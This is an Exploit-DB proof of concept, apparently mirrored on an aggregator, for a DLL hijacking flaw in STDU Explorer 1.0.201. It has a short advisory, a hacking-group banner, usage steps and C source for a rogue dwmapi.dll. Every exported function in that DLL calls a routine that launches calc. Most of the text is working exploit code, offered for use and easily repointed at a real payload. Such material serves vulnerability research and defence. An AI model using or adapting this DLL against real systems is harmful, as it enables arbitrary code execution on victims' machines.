STDU Explorer 1.0.201 – ‘dwmapi.dll’ DLL Loading Arbitrary Code Execution

• Exploit Database
• 18 阅读

• 作者： anT!-Tr0J4n
  日期： 2010-10-15
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34844/

• // source: https://www.securityfocus.com/bid/44128/info
  
  STDU Explorer is prone to a vulnerability that lets attackers execute arbitrary code.
  
  An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
  
  STDU Explorer 1.0.201 is vulnerable; other versions may also be affected. 
  
  ===================================================
  STDU explorer DLL Hijacking Exploit (dwmapi.dll)
  ===================================================
   
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  0 _ __ __ __ 1
  1 /' \__/'__`\/\ \__/'__`\ 0
  0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1
  1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0
  0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1
  1\ \____/ >> Exploit database separated by exploit 0
  0 \/___/type (local, remote, DoS, etc.)1
  11
  0[+] Site: Inj3ct0r.com0
  1[+] Support e-mail: submit[at]inj3ct0r.com1
  00
  1 #########################################1
  0 I'm anT!-Tr0J4n member from Inj3ct0r Team1
  1 #########################################0
  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
   
  
  /*
  #stdu explorer DLL Hijacking Exploit (dwmapi.dll)
  
  #Author :anT!-Tr0J4n
  
  #Greetz :Dev-PoinT.com ~ inj3ct0r.com~ All Dev-poinT members and my friends
  
  #Email :D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
  
  #Software:http://www.stdutility.com/stduexplorer.html
  
  #Tested on: Windows XP sp3
  
  # Home:www.Dev-PoinT.com &http://inj3ct0r.com
  
  =====================
  HowTO use : Compile and rename to " dwmapi.dll " , create a file in the same dir with one of the following extensions.
  
  check the result > Hack3d
  
  =====================
  
  
  #dwmapi.dll (code)
  */
   
  #include <windows.h>
  #define DLLIMPORT __declspec (dllexport)
  
  DLLIMPORT voidDwmDefWindowProc() { evil(); }
  DLLIMPORT voidDwmEnableBlurBehindWindow() { evil(); }
  DLLIMPORT voidDwmEnableComposition() { evil(); }
  DLLIMPORT voidDwmEnableMMCSS() { evil(); }
  DLLIMPORT voidDwmExtendFrameIntoClientArea() { evil(); }
  DLLIMPORT voidDwmGetColorizationColor() { evil(); }
  DLLIMPORT voidDwmGetCompositionTimingInfo() { evil(); }
  DLLIMPORT voidDwmGetWindowAttribute() { evil(); }
  DLLIMPORT voidDwmIsCompositionEnabled() { evil(); }
  DLLIMPORT voidDwmModifyPreviousDxFrameDuration() { evil(); }
  DLLIMPORT voidDwmQueryThumbnailSourceSize() { evil(); }
  DLLIMPORT voidDwmRegisterThumbnail() { evil(); }
  DLLIMPORT voidDwmSetDxFrameDuration() { evil(); }
  DLLIMPORT voidDwmSetPresentParameters() { evil(); }
  DLLIMPORT voidDwmSetWindowAttribute() { evil(); }
  DLLIMPORT voidDwmUnregisterThumbnail() { evil(); }
  DLLIMPORT voidDwmUpdateThumbnailProperties() { evil(); }
  
  int evil()
  {
  WinExec("calc", 0);
  exit(0);
  return 0;
  }